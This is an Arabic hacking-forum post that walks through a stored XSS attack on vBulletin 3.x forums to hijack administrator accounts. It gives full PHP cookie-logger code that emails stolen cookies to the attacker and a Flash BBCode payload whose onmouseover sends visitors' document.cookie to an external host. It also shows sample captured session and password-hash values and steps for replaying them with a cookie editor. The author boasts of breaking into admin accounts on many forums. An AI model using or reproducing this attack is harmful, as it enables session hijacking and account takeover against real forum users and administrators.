نهر الهكر والاختراق

اختراق منتيات الجيل الثالث .. بالتفصيل الممل ..

بسم الله الرحمن الرحيم

:zy102yn:
بمناسبة نهايتي من الامتحانات وبدأ الاجازة حبيت اقدم لكم شرح مفصل لاحدى ثغرات الـ xss

وهي ثغرة الصندوق السحري والماسي

طبعا اخونا العندليب اكتشف ثغرة في الصندوقين السحري والماسي\ ثغرة الفلاش \ ثغرة الريلر بلير\ ثغرة تنسيق القصيدة

والثغره ممكن تمشي مع أي اصدار من الجيل الثالث Vb 3.x.x وحتى 3.5.0

دلوأت هشرح لكم ثغرة الفلاش لكثرة استخدام ملفات وتوقيعات الفلاش في المنتديات.

منتديات كتيره جدا مصابه بالثغره وقليل من المنتديات اللي قفل الثغرة دي.

الثغره جربتها على منتديات كتيره ومن خلالها قدرت ادخل بنك الأدمن والحاشيه بتاعته Smile

الموضوع مش محتاج غير شوية تركيز منكم وان شاء الله الكل هيحترف الثغره دي

المهم قولوا ورايـــــــــــــا ::

((اقسم بالله ااااانني لااستخدمهااااااااااااااا ضد اخواني المسلمين))

توكلنا على الله .. نبدأ الشرح

احم احم ....

الولد اللي بياكل لبان هناك ده,, ارمي اللبانه وركز ...

نجهز العده اللي هنستخدمها ::

اول حاجه نجيب برنامج محرر الكوكيز c o o k i eEditor
تقدر تحمله من هنـــــــــــــــا

ولوجو صغير هنحتاجه في الجريمه البشعه دي

ومنتدى غلباااان محتاج يتربى

دلوأت سيب البرنامج يحمل براحته وركز معايا ...

شايف الكود ده ::

<table class=tborder cellSpacing=2 cellPadding=4 border=0><tr><td class=thead1 align=middle>كود PHP</TD></TR>
<tr><td class=alt5 align=middle> <?php
/* S4aLog v1.0
-----------------------
**Beta Of S4aLog v1.0 With Str_Repalce <;>
! You Can Get ******s And Refresh The Broweser ! v0.10

!Named Your Attack With $nm e.x http://site/log?re=http://www.s4a.cc/&nm=Attack1&id=******s

Name : Attack1
******s : ******s
Refresh : http://www.s4a.xx
!
!
Get ******s Like This :: bbpassword bbhash || Old bbpassword=12121; bbhash=12121;
!

*/
$YourMail = "yourmail@hotmail.com"; // Your E-mail
/*-----------------------*/
$Ip = $REMOTE_ADDR;
$Cooki_e = $_GET;
$NameOfAttack = $_GET;
$Refresh = $_GET;
/* Start */
$Replace******1 = array("=",";");
$Replace******2 = array(" ");
$Cooki_e = str_replace($Replace******1,$Replace******2,$Cooki _e); // Replace
/* e.x hash=0210; | hash*/
//***************************************//
$Hdr = "From: S4aLog <log-v1@s4a.cc>";
$Msg =
"
Mr Attacker Wink

,,, S4aLog v1 Beta <<
,, Name Of Attack
,, Refresh Page
,, Ip

-----------------------------------------------
****** ::
".$Cooki_e."
";
/* ------------------------------------------------------------------------- */
$Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr);
/************************************************** ***************************/
if($Send){
if($Refresh <> ""){header("location:".$Refresh);}
}
?> </TD></TR></TABLE>
الكود جديد ومضمون من برمجة الأخ : ديفل.

ملحوووظه مهمة جداا::
لما تيجي تنسخ الكود اللي فوق كل ما تقابلك 6 نجوم ****** تشيلهم وتحط مكانهم كلمة c o o k i e

فيه كمان ملاحظه ::
دور في الكود على yourmail@hotmail.com وغيره لايميلك اللي تحب توصل عليه الوجبه بتاعتك Very Happy

هنعمل ايه بقا ف الكود ده ؟؟ نهر الهكر والاختراق E34

أنا هقولك ...
تنسخه وتحطه في ملف txt وبعد ما تقوم بالتغيرات اللي ذكرناها فوق تحفظه وتغير امتداده من txt لـ php ... وااااضح يا شباب ؟؟؟

طبعا لو الكود متنسخش معاك .. تنزل لااااااخر الموضوع هتلاقي الكود منسوخ جاهز في ملف txt في المرفقات.

بعد ما تغير امتداد الكود لـ php ترفعه على النت ...
هتقولي ازاي ....؟
هقولك أحسن طريقه انك تاخد مساحه مجانيه على موقع ليكوس أو أي موقع مجاني وترفع عليه اللي تحبه.
انتهينا من الجزئيه دي ؟؟؟؟

طيب ننقل على الخطوه اللي بعدها... وهي تلغيم كود الفلاش اللي هنحطه في المنتدى::

شرح الكوود::

الكود اللي هننسخه ونعمل عليه التغيرات اللازمه ::

<table class=tborder cellSpacing=2 cellPadding=4 border=0><tr><td class=thead1 align=middle>كود PHP</TD></TR>
<tr><td class=alt5 align=middle> [flash=http://www.sitename.com/filename.swf]onmouseover='location.href="http://members.lycos.co.uk/hpc/logo.php?nm=al-battar.net&re=http://www.XXXXX.com/vb&id="+document.******'WIDTH=500 HEIGHT=350[/flash]
</TD></TR></TABLE>

بعد تغيير اللازم بتحط الكود في المنتدى .. وأي واحد هيعدي عليه هتصيبه اللعنه وهتوصلك رسالة على ايميلك بالشكل ده ::

<table class=tborder cellSpacing=2 cellPadding=4 width="95%" border=0><tr><td class=thead1 align=middle>اقتباس : </TD></TR>
<tr><td class=alt5 align=middle>c o o k i e ::
jkpopuparab1000[ yes ] bblastvisit[ 1132598777 ] bblastactivity[ 0 ]
bbuserid[ 121 ] bbpassword[ 44a82020085eb61ab6141430755cf46c ]
bbsessionhash[ 30021c825a9560cb562d137871f5a973 ] bbthread_lastview[
61b56ae8b3eaa12f2dbd2d02a9e07256a-1-{i-8158_i-1132603359_} </TD></TR></TABLE>
كل اللي يهمنا دلوقتي :::
bblastvisit
bblastactivity
bbuserid
bbpassword

انت طبعا لازم تكون مسجل في المنتدى .. علشان تقدر تغير بياناتك ببيانات الأخ اللي ناوي تدخل باسمه المنتدى

دلوقت جه دور برنامج الـ c o o k i e Editor

قبل تشغيل البرنامج اقفل أي نافذة explorer مفتوحه وبعدين شغل البرنامج.

بعد تشغيل البرنامج هيظهر زي ما هو في الصوره ::

نهر الهكر والاختراق Vb3-1

نضغط على(1) searsh .. ونكتب اسم الموقع في الفراغ (2) وبعدين GO.

هيظهر زي ماهو واضح في الصوره ::

نهر الهكر والاختراق Vb3-2

كل اللي علينا نضغط ضغطتين على كل قيمه .. ونحط مكانها القيم اللي وصلت لنا في الرساله .

وبعد كده افتح المنتدى وشوف انت مسجل دخول باسم مين ... وكل سنه وانتم طيبيــــــن
وعقبال الثغرة الجايه .... نهر الهكر والاختراق 36_1_39

وأي استفساااار أنا حااااضر

نهر الهكر والاختراق A15

<table class=tborder cellSpacing=2 cellPadding=4 width="99%" align=center border=0><tr><td class=thead1 align=right>الملفات المرفقة</TD></TR>
<tr><td class=alt5 align=right><table width="100%"><tr><td align=right colSpan=9>تحذير : يتوجب عليك فحص الملفات للتأكد من خلوها من الفيروسات والمنتدى غير مسؤول عن أي ضرر ينتج عن إستخدام هذا المرفق . </TD></TR>
<tr><td style="PADDING-RIGHT: 10px; PADDING-LEFT: 10px; PADDING-BOTTOM: 10px; PADDING-TOP: 10px" vAlign=center noWrap align=middle>

تحميل الملف </TD>
<td align=right width="100%">إسم الملف : logo.txt‏
نوع الملف: txt نهر الهكر والاختراق Txt

حجم الملف : 1.3 كيلوبايت
المشاهدات : 10
</TD></TR></TABLE></TD></TR></TABLE>